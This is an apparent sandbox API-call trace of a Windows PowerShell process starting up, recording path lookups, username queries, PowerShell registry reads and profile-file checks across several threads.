	[0744.077] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed170 | out: lpFileInformation=0xed170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0744.077] SetErrorMode (uMode=0x1) returned 0x1
	[0744.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xece60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.080] SetErrorMode (uMode=0x1) returned 0x1
	[0744.081] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed430 | out: lpFileInformation=0xed430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0744.081] SetErrorMode (uMode=0x1) returned 0x1
	[0744.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0744.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0744.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0744.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0745.380] CoTaskMemAlloc (cb=0x804) returned 0x1b9a61c0
	[0745.380] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9a61c0, nSize=0xed798 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed798) returned 0x1
	[0745.381] CoTaskMemFree (pv=0x1b9a61c0) 
	[0745.381] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0745.381] GetUserNameW (in: lpBuffer=0x1f9450, pcbBuffer=0xed7d8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed7d8) returned 1
	[0745.381] CoTaskMemFree (pv=0x1f9450) 
	[0745.381] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30dfad0*="Available", lpRawData=0x30df860) returned 1
	[0746.703] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.703] CoTaskMemFree (pv=0x242e50) 
	[0746.703] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.703] CoTaskMemFree (pv=0x242e50) 
	[0746.705] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.705] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0746.705] CoTaskMemFree (pv=0x242e50) 
	[0746.705] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.705] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0746.705] CoTaskMemFree (pv=0x242e50) 
	[0746.707] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed7b8 | out: phkResult=0xed7b8*=0x384) returned 0x0
	[0746.707] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed73c, lpData=0x0, lpcbData=0xed738*=0x0 | out: lpType=0xed73c*=0x1, lpData=0x0, lpcbData=0xed738*=0x56) returned 0x0
	[0746.707] CoTaskMemAlloc (cb=0x5a) returned 0x264da0
	[0746.707] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed70c, lpData=0x264da0, lpcbData=0xed708*=0x56 | out: lpType=0xed70c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed708*=0x56) returned 0x0
	[0746.707] CoTaskMemFree (pv=0x264da0) 
	[0746.708] RegCloseKey (hKey=0x384) returned 0x0
	[0746.709] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.709] CoTaskMemFree (pv=0x242e50) 
	[0746.726] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.727] CoTaskMemFree (pv=0x242e50) 
	[0746.732] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.733] CoTaskMemFree (pv=0x242e50) 
	[0746.733] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.733] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.733] CoTaskMemFree (pv=0x242e50) 
	[0746.734] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.734] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.734] CoTaskMemFree (pv=0x242e50) 
	[0746.735] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.735] CoTaskMemFree (pv=0x242e50) 
	[0746.736] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.736] CoTaskMemFree (pv=0x242e50) 
	[0746.737] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0746.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.737] CoTaskMemFree (pv=0x242e50) 
	[0750.650] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0750.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0750.650] CoTaskMemFree (pv=0x242e50) 
	[0752.145] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x243290
	[0752.148] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2433a0
	[0760.340] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0760.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.340] CoTaskMemFree (pv=0x2434b0) 
	[0760.350] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0760.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.350] CoTaskMemFree (pv=0x2434b0) 
	[0760.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0760.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0760.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0760.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0760.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0760.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0760.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0760.369] VirtualQuery (in: lpAddress=0xebac0, lpBuffer=0xec980, dwLength=0x30 | out: lpBuffer=0xec980*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0760.375] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed918 | out: phkResult=0xed918*=0x390) returned 0x0
	[0760.375] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed89c, lpData=0x0, lpcbData=0xed898*=0x0 | out: lpType=0xed89c*=0x1, lpData=0x0, lpcbData=0xed898*=0x56) returned 0x0
	[0760.375] CoTaskMemAlloc (cb=0x5a) returned 0x1b9ab4f0
	[0760.375] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed86c, lpData=0x1b9ab4f0, lpcbData=0xed868*=0x56 | out: lpType=0xed86c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed868*=0x56) returned 0x0
	[0760.376] CoTaskMemFree (pv=0x1b9ab4f0) 
	[0760.376] RegCloseKey (hKey=0x390) returned 0x0
	[0760.376] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed918 | out: phkResult=0xed918*=0x390) returned 0x0
	[0760.376] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed89c, lpData=0x0, lpcbData=0xed898*=0x0 | out: lpType=0xed89c*=0x1, lpData=0x0, lpcbData=0xed898*=0x56) returned 0x0
	[0760.376] CoTaskMemAlloc (cb=0x5a) returned 0x1b9ab4f0
	[0760.376] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed86c, lpData=0x1b9ab4f0, lpcbData=0xed868*=0x56 | out: lpType=0xed86c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed868*=0x56) returned 0x0
	[0760.376] CoTaskMemFree (pv=0x1b9ab4f0) 
	[0760.376] RegCloseKey (hKey=0x390) returned 0x0
	[0760.377] CoTaskMemAlloc (cb=0x20c) returned 0x1b978e50
	[0760.377] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b978e50 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0760.377] CoTaskMemFree (pv=0x1b978e50) 
	[0760.377] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xed4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0760.377] CoTaskMemAlloc (cb=0x20c) returned 0x1b978e50
	[0760.377] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b978e50 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0760.377] CoTaskMemFree (pv=0x1b978e50) 
	[0760.377] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xed4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0760.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xed670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0760.378] SetErrorMode (uMode=0x1) returned 0x1
	[0760.378] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed880 | out: lpFileInformation=0xed880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0761.347] SetErrorMode (uMode=0x1) returned 0x1
	[0761.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xed670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0761.348] SetErrorMode (uMode=0x1) returned 0x1
	[0761.348] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed880 | out: lpFileInformation=0xed880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0761.348] SetErrorMode (uMode=0x1) returned 0x1
	[0761.348] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xed670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0761.348] SetErrorMode (uMode=0x1) returned 0x1
	[0761.348] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed880 | out: lpFileInformation=0xed880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0761.348] SetErrorMode (uMode=0x1) returned 0x1
	[0761.348] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xed670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0761.348] SetErrorMode (uMode=0x1) returned 0x1
	[0761.348] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed880 | out: lpFileInformation=0xed880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0761.349] SetErrorMode (uMode=0x1) returned 0x1
	[0761.349] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0761.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.349] CoTaskMemFree (pv=0x2434b0) 
	[0761.350] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0761.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.350] CoTaskMemFree (pv=0x2434b0) 
	[0761.350] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0761.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.350] CoTaskMemFree (pv=0x2434b0) 
	[0761.351] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0761.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.351] CoTaskMemFree (pv=0x2434b0) 
	[0761.351] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0761.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.352] CoTaskMemFree (pv=0x2434b0) 
	[0761.353] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0761.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.353] CoTaskMemFree (pv=0x2434b0) 
	[0761.354] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0761.355] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xeda60 | out: lpMode=0xeda60) returned 1
	[0761.355] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0761.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.356] CoTaskMemFree (pv=0x2434b0) 
	[0761.359] SetEvent (hEvent=0x320) returned 1
	[0761.359] SetEvent (hEvent=0x390) returned 1
	[0761.359] SetEvent (hEvent=0x318) returned 1
	[0761.359] SetEvent (hEvent=0x31c) returned 1
	[0761.361] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0761.361] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.361] CoTaskMemFree (pv=0x2434b0) 
	[0761.361] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xed7b8 | out: phkResult=0xed7b8*=0x350) returned 0x0
	[0761.361] RegQueryValueExW (in: hKey=0x350, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xed73c, lpData=0x0, lpcbData=0xed738*=0x0 | out: lpType=0xed73c*=0x0, lpData=0x0, lpcbData=0xed738*=0x0) returned 0x2

Thread:
	id = 703
	os_tid = 0x15f0


Thread:
	id = 745
	os_tid = 0x16f0


Thread:
	id = 1033
	os_tid = 0x1b7c


Thread:
	id = 1036
	os_tid = 0x1b94


Thread:
	id = 1042
	os_tid = 0x1bbc


Thread:
	id = 1059
	os_tid = 0x1420


Thread:
	id = 1060
	os_tid = 0x1460

	[0551.847] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0642.097] RegCloseKey (hKey=0x2fc) returned 0x0
	[0642.097] RegCloseKey (hKey=0x304) returned 0x0
	[0642.097] RegCloseKey (hKey=0x300) returned 0x0
	[0699.103] LocalFree (hMem=0x1b7290) returned 0x0
	[0699.103] RegCloseKey (hKey=0x314) returned 0x0
	[0699.103] LocalFree (hMem=0x1b72c0) returned 0x0
	[0699.104] CloseHandle (hObject=0x2e4) returned 1
	[0699.104] CloseHandle (hObject=0x13) returned 1
	[0699.337] CloseHandle (hObject=0xf) returned 1
	[0725.168] RegCloseKey (hKey=0x2e4) returned 0x0
	[0736.477] RegCloseKey (hKey=0x2e4) returned 0x0
	[0749.484] RegCloseKey (hKey=0x38c) returned 0x0
	[0749.485] RegCloseKey (hKey=0x388) returned 0x0
	[0749.485] RegCloseKey (hKey=0x364) returned 0x0
	[0749.485] RegCloseKey (hKey=0x3a0) returned 0x0
	[0749.486] RegCloseKey (hKey=0x380) returned 0x0
	[0749.486] RegCloseKey (hKey=0x37c) returned 0x0
	[0749.486] RegCloseKey (hKey=0x378) returned 0x0
	[0749.486] RegCloseKey (hKey=0x374) returned 0x0
	[0749.487] RegCloseKey (hKey=0x370) returned 0x0
	[0749.487] RegCloseKey (hKey=0x36c) returned 0x0
	[0749.487] RegCloseKey (hKey=0x368) returned 0x0
	[0749.488] RegCloseKey (hKey=0x340) returned 0x0
	[0749.488] RegCloseKey (hKey=0x39c) returned 0x0
	[0749.488] RegCloseKey (hKey=0x398) returned 0x0
	[0749.488] RegCloseKey (hKey=0x360) returned 0x0
	[0749.489] RegCloseKey (hKey=0x35c) returned 0x0
	[0749.489] RegCloseKey (hKey=0x358) returned 0x0
	[0749.489] RegCloseKey (hKey=0x354) returned 0x0
	[0749.489] RegCloseKey (hKey=0x350) returned 0x0
	[0749.490] RegCloseKey (hKey=0x34c) returned 0x0
	[0749.490] RegCloseKey (hKey=0x348) returned 0x0
	[0749.490] RegCloseKey (hKey=0x344) returned 0x0
	[0749.490] RegCloseKey (hKey=0x394) returned 0x0
	[0749.491] RegCloseKey (hKey=0x334) returned 0x0
	[0749.491] RegCloseKey (hKey=0x330) returned 0x0
	[0749.491] RegCloseKey (hKey=0x32c) returned 0x0
	[0749.492] RegCloseKey (hKey=0x328) returned 0x0
	[0749.492] RegCloseKey (hKey=0x324) returned 0x0
	[0749.492] RegCloseKey (hKey=0x320) returned 0x0
	[0749.492] RegCloseKey (hKey=0x31c) returned 0x0
	[0749.493] RegCloseKey (hKey=0x318) returned 0x0
	[0749.493] RegCloseKey (hKey=0x390) returned 0x0
	[0749.493] RegCloseKey (hKey=0x2e4) returned 0x0
	[0778.382] RegCloseKey (hKey=0x350) returned 0x0

Thread:
	id = 1152
	os_tid = 0x1128


Thread:
	id = 1561
	os_tid = 0x20b8

	[0762.645] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0762.650] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0762.655] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0762.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.655] CoTaskMemFree (pv=0x2434b0) 
	[0762.657] VirtualQuery (in: lpAddress=0x1c8dd760, lpBuffer=0x1c8de620, dwLength=0x30 | out: lpBuffer=0x1c8de620*(BaseAddress=0x1c8dd000, AllocationBase=0x1bf50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0762.660] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0762.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.660] CoTaskMemFree (pv=0x2434b0) 
	[0762.663] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0762.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.663] CoTaskMemFree (pv=0x2434b0) 
	[0762.666] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0762.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.666] CoTaskMemFree (pv=0x2434b0) 
	[0762.675] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
